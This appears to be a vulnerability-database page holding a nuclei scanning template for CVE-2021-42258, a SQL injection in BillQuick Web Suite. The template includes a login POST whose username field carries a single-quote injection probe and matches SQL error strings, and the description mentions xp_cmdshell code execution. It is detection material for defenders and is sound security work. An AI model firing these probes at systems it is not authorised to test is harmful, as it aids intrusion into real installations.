Lucene search
K

BillQuick Web Suite SQL Injection

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 68 Views

BillQuick Web Suite SQL Injection allows unauthenticated remote code execution and potential compromise of the entire system. Apply security patches provided by the vendor to fix the vulnerability

Related
Refs
Code
id: CVE-2021-42258

info:
  name: BillQuick Web Suite SQL Injection
  author: dwisiswant0
  severity: critical
  description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to fix the SQL Injection vulnerability in the BillQuick Web Suite.
  reference:
    - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42258
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Ostorlab/KEV
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42258
    cwe-id: CWE-89
    epss-score: 0.73269
    epss-percentile: 0.9939
    cpe: cpe:2.3:a:bqe:billquick_web_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bqe
    product: billquick_web_suite
  tags: cve2021,cve,sqli,billquick,kev,bqe,vkev,vuln

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("{{VS}}")}}&__VIEWSTATEGENERATOR={{url_encode("{{VSG}}")}}&__EVENTVALIDATION={{url_encode("{{EV}}")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96

    matchers:
      - type: word
        part: body
        words:
          - "System.Data.SqlClient.SqlException"
          - "Incorrect syntax near"
          - "_ACCOUNTLOCKED"
        condition: and

    extractors:
      - type: xpath
        name: VS
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATE']"
        attribute: value

      - type: xpath
        name: VSG
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
        attribute: value

      - type: xpath
        name: EV
        internal: true
        xpath:
          - "/html/body/form/div/input[@id='__EVENTVALIDATION']"
        attribute: value
# digest: 490a00463044022036032b732cf1fa99eb50d9e079b6b86d25285c07b98cc5ffac3e29bdde8da25402202710ef441ddf2353b0e638a8df6645221f5d3afad2899a13485a0f5deb00746d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8.2High risk
Vulners AI Score8.2
CVSS 26.8
CVSS 3.19.8
EPSS0.73269
SSVC
68